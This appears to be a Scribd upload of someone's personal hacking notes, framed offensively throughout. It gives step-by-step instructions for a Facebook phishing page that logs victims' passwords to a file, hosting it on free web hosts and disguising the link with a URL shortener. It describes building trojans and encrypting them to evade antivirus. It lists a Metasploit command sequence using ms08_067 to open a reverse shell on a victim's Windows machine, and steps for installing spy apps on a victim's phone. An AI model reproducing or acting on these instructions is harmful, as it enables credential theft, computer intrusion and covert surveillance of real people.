0% found this document useful (0 votes)
124 views

Hack Track

The document provides information on various hacking and security topics including reverse engineering, debugging tools, cracking software tutorials, phishing methods, creating trojans, Android hacking, and using Metasploit and Armitage. Specific techniques, tools, and websites are mentioned for tasks like viewing source code, changing action URLs in forms, creating free websites to host files, using URL shorteners, encrypting files to avoid antivirus detection, exploiting vulnerabilities in Windows systems using Metasploit, and remotely accessing an Android device using spying apps.

Uploaded by

Rohith Reddy
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
124 views

Hack Track

The document provides information on various hacking and security topics including reverse engineering, debugging tools, cracking software tutorials, phishing methods, creating trojans, Android hacking, and using Metasploit and Armitage. Specific techniques, tools, and websites are mentioned for tasks like viewing source code, changing action URLs in forms, creating free websites to host files, using URL shorteners, encrypting files to avoid antivirus detection, exploiting vulnerabilities in Windows systems using Metasploit, and remotely accessing an Android device using spying apps.

Uploaded by

Rohith Reddy
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

webinfinium----- website

ADMIN - finance- goindigo

----------------------------------------------------------------------------------

Reverse Engineering:
MOV(move): going to moove the data from sourcec to destination.
syntax: MOV dest,src

------------------------
Debug_Tools:
OllyDBG : DEbugger available
www.ollydbg.com

-----------------------------------------------------------------------------------
----
cracking software: Lena's Tutorials on Reverse Engineering ---- 20 videos. [20
wayes to debug a software]
-----------------------------------------------------------------------------------
------

Phishing Method:

Open Website -- view 'source code'


-- search 'action' available inside form tag
-- change action to login.php
and keep only method="post" and action="login.php" in the form
And this file as HTML

Fb.html -- login.php--log.txt

step 1 : Register your website


For free website creation.....
www.byethost.com
www.hostinger.in
www.110mb.com
www.freehostia.com
www.000webhost.com
after creating

rohith.000webhost.com/cpanel
after opening control panel --- goto file upload ----
in that go to public_html
create a folder and upload fb.html, login.php, log.txt and save
And change permission to 7 7 7

url shortner- goo.gl{It will give short ur url}

All passwords will be saved in log.txt......


-----------------------------------------------------------------------------------
-----------------------------------
virus, worms, trojans

Virus- Damage data


Worm - Transmit virus over network / internet
Trojens- Server-client model
FUD - Fully Undetected By antivirus
------------
Two types of trojans
"fuglekos.com/ip-grabber/" - to grab others ip address by creating an image.
1] Direct- "Prorat v1.9 Software" it is to create trojan and attach to any type of
file like jpg, .exe etc.... by thi we can use thers pc without they noticing

2]Reverse-"VPN-Virtual Private Network" by using this we can convert dynamic ip to


static ip for free.
Download softether vpn-client manager from Softether Website
Download vpngate.net- download VPN list

virustotal.com--"To check wheter the file automatically detected virus in victims


pc"

FUD-Fully Undetectable
obsidium software: this is software protection so that we can encript the trojan
file and antivirus cannot detect it.

browse:-
www.cypherx.org

software Protection suite

-----------------------------------------------------------------------------------
--------------------------------------
Hacking using VM WARE(BlackTrack Or Kali Linux)

BlackTrack - Kali Linux : both are linux based os....\ By the hackers for the
hackers (used for only hacking)

www.cve.mitre.org - vulnerabilities(we can report vulnerabilities)

when we report it they will give one unique code .

www.exploit-db.com - exploits ( we can know bout vulnerabilities)

Metasploit : 5 commands
- vulnerability : A weakness that allows an attacker to compromise the security
of system.
- Exploit: code/step by step method which allows an attacker to take an
adavantage of system
- Payload : Code which runson the system after exploitation
- Encoders : Safety

__________ steps
BT : IP : attacker : 132.168.140.132
WINXP: IP : Victim : 192.168.140.141
---------------------------------------------------------------------------
Process::

msfconsole(In Terminal Box)


msf>search internet explorer(crome/safari/smb/mozilla etc)
msf>use exploit/windows/smb/ms08_067 netapi
msf>show options
msf>set RHOST 192.168.140.141
msf>show payloads
msf>set payload windows/shell/reverse_tcp
msf>show options
we will get options of LHOST
msf>set LHOST 192.168.140.132
msf>exploit
-----------------------------------------------------------------------------------
---------
Armitage - GUI of metasploit( we can use without commands)
___________________________________________________________________________________
__________________________________

ANDROID HACKING

step1 : Download Application ...[ spytomobile.com/d ]


step2 : Install it on victims cell phne
step3 : go to widgets & data_backup widget
step4 : Enter your mail ID
step5 : Create Account
step5 : Check your mail and enjoy.

data_backup.
___________________________________________________________________________________
____________________________________

You might also like